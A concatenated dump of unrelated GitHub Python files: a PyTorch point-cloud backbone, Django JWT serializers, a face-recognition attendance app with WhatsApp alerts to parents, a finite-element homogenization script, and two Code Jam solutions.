DETAILED_HELP\n","repo_name":"egzonarexhepi/mathpixlatexconverter","sub_path":"frontend/matt12345/google-cloud-sdk/.install/.backup/lib/surface/compute/instances/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":26243,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"35319023712","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport copy\nimport pdb\n\n\nact_layer = nn.ReLU(inplace=True)\n\ndef conv3x3(in_planes, out_planes, stride=1, dilation=1, bias=False):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=bias)\n\n\nclass DownSample2D(nn.Module):\n def __init__(self, in_planes, out_planes, stride=1):\n super(DownSample2D, self).__init__()\n self.conv_branch = nn.Sequential(\n conv3x3(in_planes, out_planes, stride=stride, dilation=1),\n nn.BatchNorm2d(out_planes)\n )\n\n self.pool_branch = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.MaxPool2d(kernel_size=3, stride=stride, padding=1, dilation=1)\n )\n\n self.act = act_layer\n \n def forward(self, x):\n x_conv = self.conv_branch(x)\n x_pool = self.pool_branch(x)\n x_out = self.act(x_conv + x_pool)\n return x_out\n\n\ndef get_module(param_dic, **kwargs):\n for key in param_dic:\n if (key != 'type') and param_dic[key] is not None:\n kwargs[key] = param_dic[key]\n \n result_module = eval(param_dic['type'])(**kwargs)\n return result_module\n\n\ndef gen_scene_feat(pc_feat, k=5):\n '''\n Input:\n pc_feat, (BS, C, N, 1)\n Output:\n scene_feat, (BS, C)\n '''\n pc_feat_topk = torch.topk(pc_feat.squeeze(-1), k=k, dim=2, largest=True, sorted=False)[0]\n scene_feat = pc_feat_topk.mean(dim=2)\n return scene_feat\n\n\nclass ChannelAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(ChannelAtt, self).__init__()\n self.cnet = nn.Sequential(\n nn.AdaptiveAvgPool2d(output_size=1),\n nn.Conv2d(channels, channels // reduction, kernel_size=1, padding=0),\n act_layer,\n nn.Conv2d(channels // reduction, channels, kernel_size=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n #channel wise\n ca_map = self.cnet(x)\n x = x * ca_map\n return x\n\n\nclass SpatialAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(SpatialAtt, self).__init__()\n self.snet = nn.Sequential(\n conv3x3(channels, 4, stride=1, dilation=1),\n nn.BatchNorm2d(4),\n act_layer,\n conv3x3(4, 1, stride=1, dilation=1, bias=True),\n nn.Sigmoid()\n )\n \n def forward(self, x):\n #spatial wise\n sa_map = self.snet(x)\n x = x * sa_map\n return x\n\n\nclass CSAtt(nn.Module):\n def __init__(self, channels, reduction=4):\n super(CSAtt, self).__init__()\n self.channel_att = ChannelAtt(channels, reduction)\n self.spatial_att = SpatialAtt(channels, reduction)\n \n def forward(self, x):\n #channel wise\n x1 = self.channel_att(x)\n x2 = self.spatial_att(x1)\n return x2\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, reduction=1, dilation=1, use_att=True):\n super(BasicBlock, self).__init__()\n self.layer = nn.Sequential(\n conv3x3(in_planes=inplanes, out_planes=inplanes // reduction, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // reduction),\n act_layer,\n conv3x3(in_planes=inplanes // reduction, out_planes=inplanes, stride=1, dilation=dilation),\n nn.BatchNorm2d(inplanes)\n )\n\n self.use_att = use_att\n if 
self.use_att:\n self.channel_att = ChannelAtt(channels=inplanes, reduction=4)\n \n self.act = act_layer\n \n def forward(self, x):\n out = self.layer(x)\n if self.use_att:\n out = self.channel_att(out)\n \n out = self.act(out + x)\n return out\n\n\nclass BasicBlockv2(nn.Module):\n def __init__(self, inplanes, reduction=1, dilation=1, use_att=True):\n super(BasicBlockv2, self).__init__()\n self.conv1 = nn.Sequential(\n conv3x3(in_planes=inplanes, out_planes=inplanes // reduction, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // reduction),\n act_layer\n )\n\n self.conv2_0 = nn.Sequential(\n conv3x3(in_planes=inplanes // reduction, out_planes=inplanes // 2, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // 2)\n )\n self.conv2_1 = nn.Sequential(\n act_layer,\n conv3x3(in_planes=inplanes // 2, out_planes=inplanes // 2, stride=1, dilation=1),\n nn.BatchNorm2d(inplanes // 2)\n )\n\n self.use_att = use_att\n if self.use_att:\n self.channel_att = ChannelAtt(channels=inplanes, reduction=4)\n \n self.act = act_layer\n \n def forward(self, x):\n #pdb.set_trace()\n x1 = self.conv1(x)\n\n # multi-scale and attention fusion\n x2_0 = self.conv2_0(x1)\n x2_1 = self.conv2_1(x2_0)\n\n x2 = torch.cat((x2_0, x2_1), dim=1)\n if self.use_att:\n x2 = self.channel_att(x2)\n\n out = self.act(x2 + x)\n return out\n\n\nclass PredBranch(nn.Module):\n def __init__(self, cin, cout):\n super(PredBranch, self).__init__()\n self.pred_layer = nn.Sequential(nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1))\n \n def forward(self, x):\n x1 = F.dropout(x, p=0.2, training=self.training, inplace=False)\n pred = self.pred_layer(x1)\n return pred\n\n\nclass PointNet(nn.Module):\n def __init__(self, cin, cout, pre_bn=False, post_act=True):\n super(PointNet, self).__init__()\n self.layer = None\n if pre_bn and post_act:\n self.layer = nn.Sequential(\n nn.BatchNorm2d(cin),\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout),\n act_layer\n )\n elif (not pre_bn) and post_act:\n self.layer = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout),\n act_layer\n )\n elif pre_bn and (not post_act):\n self.layer = nn.Sequential(\n nn.BatchNorm2d(cin),\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout)\n )\n elif (not pre_bn) and (not post_act):\n self.layer = nn.Sequential(\n nn.Conv2d(cin, cout, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),\n nn.BatchNorm2d(cout)\n )\n \n def forward(self, x):\n x_feat = self.layer(x)\n return x_feat\n\n\nclass PointNetStacker(nn.Module):\n def __init__(self, cin, cout, pre_bn=False, post_act=True, stack_num=1):\n super(PointNetStacker, self).__init__()\n layers = None\n if stack_num == 1:\n layers = [PointNet(cin=cin, cout=cout, pre_bn=pre_bn, post_act=post_act)]\n else:\n layers = [PointNet(cin=cin, cout=cout, pre_bn=pre_bn, post_act=True)]\n for i in range(1, stack_num - 1):\n layers.append(PointNet(cin=cout, cout=cout, pre_bn=False, post_act=True))\n \n layers.append(PointNet(cin=cout, cout=cout, pre_bn=False, post_act=post_act))\n \n self.layer = nn.Sequential(*layers)\n \n def forward(self, x):\n x_feat = self.layer(x)\n return x_feat\n\n\nclass BranchAttFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(BranchAttFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n 
self.weights = nn.Parameter(torch.ones(len(self.in_channel_list), dtype=torch.float32), requires_grad=True)\n self.feat_model = nn.ModuleList()\n for i, in_channel in enumerate(self.in_channel_list):\n self.feat_model.append(PointNet(cin=in_channel, cout=out_channel, pre_bn=False))\n \n def forward(self, *x_list):\n #pdb.set_trace()\n weights = F.softmax(self.weights, dim=0)\n x_out = self.feat_model[0](x_list[0]) * weights[0]\n for i in range(1, len(x_list)):\n x_out = x_out + self.feat_model[i](x_list[i]) * weights[i]\n \n return x_out\n\n\nclass CatFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(CatFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n s = 0\n for in_channel in self.in_channel_list:\n s = s + in_channel\n \n c_mid = max(s // 2, out_channel)\n self.merge_layer = nn.Sequential(\n nn.Conv2d(s, c_mid, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(c_mid),\n act_layer,\n nn.Conv2d(c_mid, out_channel, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channel),\n act_layer\n )\n \n def forward(self, *x_list):\n #pdb.set_trace()\n x_merge = torch.cat(x_list, dim=1)\n x_out = self.merge_layer(x_merge)\n return x_out\n\n\nclass PointAttFusion(nn.Module):\n def __init__(self, in_channel_list, out_channel):\n super(PointAttFusion, self).__init__()\n self.in_channel_list = in_channel_list\n self.out_channel = out_channel\n\n assert len(self.in_channel_list) >= 2\n\n self.att_layer = nn.Sequential(\n nn.Conv2d(len(self.in_channel_list) * out_channel, out_channel, kernel_size=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channel),\n act_layer,\n nn.Conv2d(out_channel, len(self.in_channel_list), kernel_size=1, padding=0)\n )\n\n # make feature layer\n self.feat_model = nn.ModuleList()\n for i, in_channel in enumerate(self.in_channel_list):\n self.feat_model.append(PointNet(cin=in_channel, cout=out_channel, pre_bn=False))\n \n def forward(self, *x_list):\n #pdb.set_trace()\n batch_size = x_list[0].shape[0]\n\n x_feat_list = [self.feat_model[i](x_list[i]) for i in range(len(x_list))]\n\n x_merge = torch.stack(x_feat_list, dim=1) #(BS, S, channels, N, 1)\n\n ca_map = self.att_layer(x_merge.view(batch_size, len(self.in_channel_list)*self.out_channel, -1, 1))\n ca_map = ca_map.view(batch_size, len(self.in_channel_list), 1, -1, 1) #(BS, S, 1, N, 1)\n ca_map = F.softmax(ca_map, dim=1) #(BS, S, 1, N, 1)\n\n x_out = (x_merge * ca_map).sum(dim=1) #(BS, channels, N, 1)\n return x_out\n\n\nclass BilinearSample(nn.Module):\n def __init__(self, in_dim, scale_rate):\n super(BilinearSample, self).__init__()\n self.scale_rate = scale_rate\n \n def forward(self, grid_feat, grid_coord):\n '''\n Input:\n grid_feat, (BS, C, H, W)\n grid_coord, (BS, N, 2, S)\n Output:\n pc_feat, (BS, C, N, S)\n '''\n H = grid_feat.shape[2]\n W = grid_feat.shape[3]\n\n grid_sample_x = (2 * grid_coord[:, :, 1] * self.scale_rate[1] / (W - 1)) - 1 #(BS, N, S)\n grid_sample_y = (2 * grid_coord[:, :, 0] * self.scale_rate[0] / (H - 1)) - 1 #(BS, N, S)\n\n grid_sample_2 = torch.stack((grid_sample_x, grid_sample_y), dim=-1) #(BS, N, S, 2)\n pc_feat = F.grid_sample(grid_feat, grid_sample_2, mode='bilinear', padding_mode='zeros', align_corners=True) #(BS, C, N, S)\n return 
pc_feat","repo_name":"GangZhang842/CPGNet","sub_path":"networks/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":12050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"31664529594","text":"from django.contrib.auth.models import update_last_login\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import RefreshToken, TokenObtainSerializer\nfrom rest_framework_simplejwt.settings import api_settings\n\n\nclass JWTTokenRefreshSerializer(serializers.Serializer):\n refresh_token = serializers.CharField()\n access_token = serializers.CharField(read_only=True)\n\n def validate(self, attrs):\n refresh = RefreshToken(attrs[\"refresh_token\"])\n data = {\n \"access_token\": str(refresh.access_token),\n \"refresh_token\": str(refresh),\n }\n return data\n\n\nclass JWTTokenObtainPairSerializer(TokenObtainSerializer):\n @classmethod\n def get_token(cls, user):\n return RefreshToken.for_user(user)\n\n def validate(self, attrs):\n data = super().validate(attrs)\n\n refresh = self.get_token(self.user)\n\n data.update(\n {\n \"access_token\": str(refresh.access_token),\n \"refresh_token\": str(refresh),\n }\n )\n\n if api_settings.UPDATE_LAST_LOGIN:\n update_last_login(None, self.user)\n return data\n","repo_name":"motivactions/reactionserver","sub_path":"auths/api/auth/jwt/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3612663524","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport face_recognition\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\nimport pickle\r\nimport pymongo \r\nimport pywhatkit as pwk\r\nimport webbrowser\r\n\r\nwindow=Tk()\r\n\r\n\r\n#take attendance\r\n\r\ndef tkat():\r\n \r\n #loading pickle files\r\n \r\n f=open(\"ref_name.pkl\",\"rb\")\r\n ref_dictt=pickle.load(f) \r\n f.close()\r\n f=open(\"ref_embed.pkl\",\"rb\")\r\n embed_dictt=pickle.load(f) \r\n f.close()\r\n \r\n #lists to store name and embeddings\r\n \r\n known_face_encodings = [] \r\n known_face_names = [] \r\n \r\n for ref_id , embed_list in embed_dictt.items():\r\n for my_embed in embed_list:\r\n known_face_encodings +=[my_embed]\r\n known_face_names += [ref_id]\r\n \r\n #capturing video with webcam\r\n \r\n video_capture = cv2.VideoCapture(0)\r\n face_locations = []\r\n face_encodings = []\r\n p_names = set()\r\n face_names = []\r\n process_this_frame = True\r\n \r\n while True :\r\n ret, frame = video_capture.read()\r\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\r\n rgb_small_frame = small_frame[:, :, ::-1]\r\n \r\n if process_this_frame:\r\n face_locations = face_recognition.face_locations(rgb_small_frame)\r\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\r\n face_names = []\r\n \r\n for face_encoding in face_encodings:\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\r\n name = \"Unknown\"\r\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\r\n best_match_index = np.argmin(face_distances)\r\n \r\n if matches[best_match_index]:\r\n name = known_face_names[best_match_index]\r\n face_names.append(name)\r\n p_names.add(name)\r\n process_this_frame = not process_this_frame\r\n \r\n for (top_s, right, bottom, left), name in zip(face_locations, face_names):\r\n top_s *= 4\r\n right *= 4\r\n bottom *= 4\r\n left 
*= 4\r\n            cv2.rectangle(frame, (left, top_s), (right, bottom), (0, 255, 0), 2)\r\n            cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 255, 255), cv2.FILLED)\r\n            font = cv2.FONT_HERSHEY_DUPLEX\r\n            cv2.putText(frame, ref_dictt[name], (left + 6, bottom - 6), font, 1.0, (0, 0, 255), 1)\r\n        font = cv2.FONT_HERSHEY_DUPLEX\r\n        cv2.imshow('Video', frame)\r\n        \r\n        if cv2.waitKey(1) & 0xFF == ord('q'):\r\n            break\r\n    \r\n    video_capture.release()\r\n    cv2.destroyAllWindows()\r\n    \r\n    #preparing attendance list to update database\r\n    \r\n    global attendance_list\r\n    attendance_list = []\r\n    for present in p_names:\r\n        attendance_list.append(present)\r\n    \r\n    #selecting and printing details of absent students\r\n    \r\n    global absent_list\r\n    absent_list = list(ref_dictt.keys())\r\n    \r\n    for s_id in attendance_list:\r\n        absent_list.remove(s_id)\r\n    \r\n    absl=str(absent_list)[1:-1]\r\n    varabsent.set(absl)\r\n    \r\n\r\n#give duty leave\r\n\r\ndef dl():\r\n\r\n    #collecting data of students with duty leave\r\n    \r\n    exp_stu_id=varleave.get()\r\n    dutyleave=list(map(str,exp_stu_id.split()))\r\n    \r\n    #updating attendance list to include students with duty leave\r\n    \r\n    for s_id in dutyleave:\r\n        attendance_list.append(s_id)\r\n        absent_list.remove(int(s_id))\r\n\r\n\r\n#mark attendance\r\n\r\ndef mkat():\r\n    \r\n    #connecting to mongodb\r\n    \r\n    myclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n    mydb=myclient[\"attendance\"]\r\n    mycol=mydb[\"student\"]\r\n    \r\n    #marking attendance in DB\r\n    \r\n    for s_id in attendance_list:\r\n        st_id = int(s_id)\r\n        mycol.update_many({\"_id\":st_id},{\"$set\" :{\"Status\":\"present\"}})\r\n    \r\n    for s_id in absent_list:\r\n        st_id = int(s_id)\r\n        mycol.update_many({\"_id\":st_id},{\"$set\" :{\"Status\":\"absent\"}})\r\n    messagebox.showinfo(\"Updated\",\"Attendance Has Been Updated In Database\")\r\n\r\n\r\n#send alert message\r\n\r\ndef sndmsg():\r\n    \r\n    #connecting to mongodb\r\n    \r\n    myclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n    mydb=myclient[\"attendance\"]\r\n    mycol=mydb[\"student\"]\r\n    cun=\"+91\"\r\n    #fetching details from mongodb\r\n    student=mycol.find({\"Status\":\"absent\"})\r\n    \r\n    for i in student:\r\n        num=str(i[\"Phone\"])\r\n        mob=cun+num\r\n        #send message to one person\r\n        msg=\"Your Child \"+i[\"Name\"]+\" is absent in class\"\r\n        pwk.sendwhatmsg_instantly(mob, msg)\r\n    \r\n    messagebox.showinfo(\"Done\",\"Message Has Been Sent To Parents\")\r\n\r\n\r\n#help website\r\n\r\ndef helpopen():\r\n    webbrowser.open('https://vellathottam.github.io')\r\n\r\n\r\n#about website\r\n\r\ndef aboutopen():\r\n    webbrowser.open('https://vellathottam.github.io')\r\n\r\n\r\n#menubar and menu options\r\n\r\nmenubar=Menu(window)\r\n\r\nsubmenu = Menu(menubar, tearoff =0)\r\nsubmenu.add_command(label = 'Record Attendance', command = tkat)\r\nsubmenu.add_command(label = 'Mark Attendance', command = mkat)\r\n\r\nattendance = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Attendance', menu = attendance)\r\nattendance.add_cascade(label = 'Take Attendance', menu = submenu)\r\nattendance.add_command(label = 'View Attendance')\r\n\r\nalert = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Alert', menu = alert)\r\nalert.add_command(label = 'Send Alert', command = sndmsg)\r\n\r\nhelp_menu = Menu(menubar, tearoff = 0)\r\nmenubar.add_cascade(label = 'Help', menu = help_menu)\r\nhelp_menu.add_command(label = 'Get Help', command = helpopen)\r\nhelp_menu.add_separator()\r\nhelp_menu.add_command(label = 'About ROI', command = aboutopen)\r\n\r\n\r\n#entry and 
labels\r\n\r\nvarstaffid = StringVar()\r\nlabel_a=Label(window, text='Staff ID', font=\"Cambria\")\r\nlabel_a.place(x=100, y=199)\r\nstaffid=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varstaffid)\r\nstaffid.place(x=200, y=200)\r\n\r\n\r\nvarperiod = StringVar()\r\nlabel_b=Label(window, text='Hour', font=\"Cambria\")\r\nlabel_b.place(x=550, y=199)\r\nperiod=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varperiod)\r\nperiod.place(x=655, y=200)\r\n\r\n\r\nvarabsent = StringVar()\r\nlabel_c=Label(window, text='Absentees', font=\"Cambria\")\r\nlabel_c.place(x=100, y=349)\r\nabsent=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varabsent)\r\nabsent.place(x=200, y=350)\r\n\r\n\r\nvarleave = StringVar()\r\nlabel_c=Label(window, text='Duty Leave', font=\"Cambria\")\r\nlabel_c.place(x=550, y=349)\r\nleave=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varleave)\r\nleave.place(x=655, y=350)\r\n\r\n\r\ncapture=Button(window, text=\"Give Duty Leave\", font=\"Cambria\", bd=0, activebackground=\"#2770f1\", bg=\"#27e9f1\", command=dl)\r\ncapture.place(x=420, y=470)\r\n\r\n\r\n#window creation and initialization\r\n\r\nwindow.config(menu = menubar)\r\nwindow.title('R.O.I')\r\nwindow.geometry(\"984x666\")\r\nwindow.mainloop()","repo_name":"vellathottam/ROI","sub_path":"att.py","file_name":"att.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40322698092","text":"import os,sys\nimport HierAMuS\nimport gmsh\nimport matplotlib.pyplot as plt\n\n\ndef rectAngularRVE(L,b,h,nx,ny,nz,order):\n # current path of file\n currPath = os.path.dirname(os.path.realpath(__file__))\n\n E=100\n nu=0.3\n \n \n lam = E*nu/((1+nu)*(1-2*nu))\n mu = E/(2*(1+nu))\n\n gmsh.initialize()\n gmsh.model.add(\"RVE\")\n\n\n cVert = gmsh.model.occ.addPoint(0,0,0)\n gmsh.model.occ.addBox(-L/2, -b/2, -h/2, L/2, b, h, 1)\n gmsh.model.occ.addBox(0, -b/2, -h/2, L/2,b, h, 2)\n\n \n gmsh.model.occ.synchronize()\n gmsh.model.occ.removeAllDuplicates()\n gmsh.model.occ.synchronize()\n lengthlines = [9,10,11,12,17,18,19,20]\n heightlines = [1,3,5,7,13,15]\n widhtlines = [2,4,6,8,14,16]\n\n for i in lengthlines:\n gmsh.model.mesh.setTransfiniteCurve(i,nx+1)\n for j in heightlines:\n gmsh.model.mesh.setTransfiniteCurve(j,nz+1)\n for k in widhtlines:\n gmsh.model.mesh.setTransfiniteCurve(k,ny+1)\n\n faces = [1,2,3,4,5,6,7,8,9,10,11]\n for i in faces:\n gmsh.model.mesh.setTransfiniteSurface(i) \n\n cFace = 2\n\n gmsh.model.mesh.setTransfiniteVolume(1)\n gmsh.model.mesh.setTransfiniteVolume(2)\n gmsh.option.setNumber(\"Mesh.RecombineAll\", 1)\n gmsh.model.mesh.generate(3)\n \n\n RVE = HierAMuS.FEMPy(currPath,\"RVE\")\n RVE.setStaticHomogenizationSolutionState()\n RVE.setSolver(6)\n RVE.getMacroCommands().setLogLevel(RVE.BasicLog(),RVE.BasicLog())\n \n gm = RVE.getMeshCommands().getFromGMESH()\n gm.addGeomFromGmsh(gmsh)\n #gmsh.fltk.run()\n \n RVE.getMeshCommands().getGeometryCommands().checkGeometry()\n \n gm.addVolumeElements(gmsh,1,1)\n gm.addVolumeElements(gmsh,2,1)\n gm.addVolumeConstraint(gmsh,1,cVert,2)\n gm.addVolumeConstraint(gmsh,2,cVert,2)\n gm.addFaceConstraint(gmsh,cFace,cVert,3)\n #gm.addVolumeConstraint(gmsh,1,cVert,4)\n #gm.addVolumeConstraint(gmsh,2,cVert,4)\n \n mform = RVE.getMeshCommands().getMaterialFormulations()\n mform.addMA1_3D_LinearElastic_Isotrop(1,100,0.3)\n 
#mform.addMA3_SmallStrainPlasticity(number=1,E=100,nu=0.3,y0=10,yinf=0,xh=10,xd=0,eta=0)\n \n eform = RVE.getMeshCommands().getElementFormulations()\n #eform.addEL300_3DSolid(num=1,meshiddisp=1,disporder=order,mode=1)\n eform.addEL303_ThermoMechanikSolid3D(num=1,meshiddisp=1,meshidtemperatur=2,shapeorder=order,mu=mu,lamb=lam,alpha=0.1,c=0,rho0=0,T0=0,kappa=1,mode=1)\n eform.addEL307_VolumeConstraint(num=2,meshiddisp=1,meshIdLam=3,shapeorder=order,center=1,stiffness=1)\n eform.addEL207_FaceConstraint(num=3,meshIdDisp=1,meshIdRot=4,meshIdLam=5,meshIdMu=6,dispOrder=order,k=1,mode=1)\n eform.addEL307_VolumeConstraint(num=4,meshiddisp=2,meshIdLam=7,shapeorder=order,center=0,stiffness=1,mode=4)\n \n \n mesh = RVE.getMeshCommands()\n mesh.addMaterial(1,1,1)\n mesh.addMaterial(2,1,2)\n mesh.addMaterial(3,1,3)\n mesh.addMaterial(4,1,4)\n \n mesh.setDegreesOfFreedom()\n mesh.getBoundaryConditions().BCVertex(cVert,1,[1,1,1])\n mesh.getBoundaryConditions().BCVertex(cVert,4,[1,1,1])\n \n RVE.getMacroCommands().getHomogenizationCommands().Homogenization3DThermoMechBeam(meshIdDisp=1,dispOrder=order,meshIdTemp=2,tempOrder=order,bctype=1)\n \n RVE.getMacroCommands().sparseSetUp()\n \n \n RVE.getMacroCommands().getHomogenizationCommands().computeAMatrix()\n #gmsh.fltk.run()\n gmsh.finalize()\n \n return RVE\n\n\ndef run():\n #pass\n #return 0\n L=1.0\n RVE = rectAngularRVE(1,1,1,8,8,8,order=1)\n RVE.getMacroCommands().setLogLevel(RVE.FullLog(),RVE.FullLog())\n #RVE.getMacroCommands().printInfo()\n RVE.getMacroCommands().getHomogenizationCommands().setStrains([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.1])\n #RVE.getMacroCommands().newton(refResidual=1e-7)\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().getHomogenizationCommands().homogenize()\n print(\"test\")\n C=RVE.getMacroCommands().getHomogenizationCommands().getCMatrix()\n print(C[7,7])\n print(C[11,11])\n RVE.getPlotCommands().toFile()\n RVE.getMacroCommands().computeEigenValues(10,30)\n \n \n \ndef createDiag():\n L=0.01\n x = []\n y = []\n for i in range(16):\n RVE = rectAngularRVE(L,1,1,4,4,4,order=2)\n RVE.getMacroCommands().setLogLevel(RVE.NoLog(),RVE.NoLog())\n #RVE.getMacroCommands().printInfo()\n RVE.getMacroCommands().getHomogenizationCommands().setStrains([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.1])\n #RVE.getMacroCommands().newton(refResidual=1e-7)\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().getHomogenizationCommands().homogenize()\n C=RVE.getMacroCommands().getHomogenizationCommands().getCMatrix()\n x.append(L)\n y.append(abs(C[11,11]))\n #RVE.getPlotCommands().toFile()\n #RVE.getMacroCommands().computeEigenValues(10,30)\n L*=2\n \n fig, ax = plt.subplots()\n ax.plot(x,y)\n plt.show()\n \n \nrun()","repo_name":"sklarmann/HierAMuS","sub_path":"Tests/debugtests/homogenization/thermobeam/firstCoupledThermo/RVE.py","file_name":"RVE.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23550424411","text":"inputfile = \"B-large.in\"\r\noutputfile = \"output.out\"\r\n\r\noutput = \"\"\r\n\r\ndef timevalue(t):\r\n hours = int(t[0:2]) * 60\r\n minutes = int(t[3:5])\r\n return hours + minutes\r\n\r\ndef minutesvalue(m):\r\n return m\r\n\r\n\r\nfi = file(inputfile)\r\ndata = fi.read()\r\nfi.close()\r\n\r\nlines = data.split(\"\\n\")\r\n\r\ncindex = 1\r\n\r\ncases = int(lines[0])\r\n\r\n\r\n\r\nfor i in range(1,cases + 
1):\r\n Amust = []\r\n Bmust = []\r\n\r\n Aarrives = []\r\n Barrives = []\r\n \r\n \r\n resttime= minutesvalue(int(lines[cindex]))\r\n temp = lines[cindex + 1]\r\n temp2 = temp.split(\" \")\r\n NA = int(temp2[0])\r\n NB = int(temp2[1])\r\n\r\n cindex += (2)\r\n\r\n for k in range(0,NA):\r\n temp = lines[cindex]\r\n temp2 = temp.split(\" \")\r\n Amust.append(timevalue(temp2[0]))\r\n Barrives.append(timevalue(temp2[1]) + resttime)\r\n cindex+= 1\r\n\r\n for k in range(0,NB):\r\n temp = lines[cindex]\r\n temp2 = temp.split(\" \")\r\n Bmust.append(timevalue(temp2[0]))\r\n Aarrives.append(timevalue(temp2[1]) + resttime)\r\n cindex+= 1\r\n\r\n AmustT = Amust[:]\r\n BmustT = Bmust[:]\r\n\r\n # Processing A\r\n AmustT.sort()\r\n Aarrives.sort()\r\n AmustT.reverse()\r\n\r\n for T1 in range(len(Aarrives) - 1,-1,-1):\r\n for T2 in range(len(AmustT) - 1,-1,-1):\r\n if Aarrives[T1] <= AmustT[T2]:\r\n Aarrives.pop(T1)\r\n AmustT.pop(T2)\r\n break\r\n \r\n \r\n # Prcessing B\r\n BmustT.sort()\r\n Barrives.sort()\r\n BmustT.reverse()\r\n\r\n for T1 in range(len(Barrives) - 1,-1,-1):\r\n for T2 in range(len(BmustT) - 1,-1,-1):\r\n if Barrives[T1] <= BmustT[T2]:\r\n Barrives.pop(T1)\r\n BmustT.pop(T2)\r\n break\r\n \r\n\r\n output += \"Case #\"+str(i)+\": \" + str(len(AmustT)) + \" \" + str(len(BmustT)) + \"\\n\"\r\n\r\n\r\nfile2 = file(outputfile,\"w\")\r\nfile2.write(output)\r\nfile2.close()\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_2/276.py","file_name":"276.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559774851","text":"def getTidy(s):\r\n s = list(s)\r\n consecutive = -1\r\n consecut = -1\r\n for j in range(0, len(s)-1):\r\n a = int(s[j])\r\n b = int(s[j+1])\r\n if a > b:\r\n if consecutive < 0:\r\n consecutive = j\r\n if s[consecutive] == '1':\r\n s[consecutive] = ''\r\n else:\r\n s[consecutive] = str(int(s[consecutive]) - 1)\r\n for k in range(consecutive + 1, len(s)):\r\n s[k] = '9'\r\n return ''.join(s)\r\n elif a == b and consecut != a:\r\n consecutive = j\r\n consecut = a\r\n return ''.join(s)\r\n\r\nc_num = int(input())\r\ncases = []\r\nfor i in range(0, c_num):\r\n cases.append(input())\r\nfor i in range(0, c_num):\r\n print(\"Case #%d: %s\" % ((i+1), getTidy(cases[i])))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3834.py","file_name":"3834.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43082358262","text":"test_mode = False # use test wikipedia instead of normal one if True\nuser_name = u'Lonjers' #should be bot name in production\nbot_user_name = u'User:ProjectRequestedPagesBot'\n# normally posts to something like\n# config.bot_user_name + '/Most Requested ' + project_name + ' 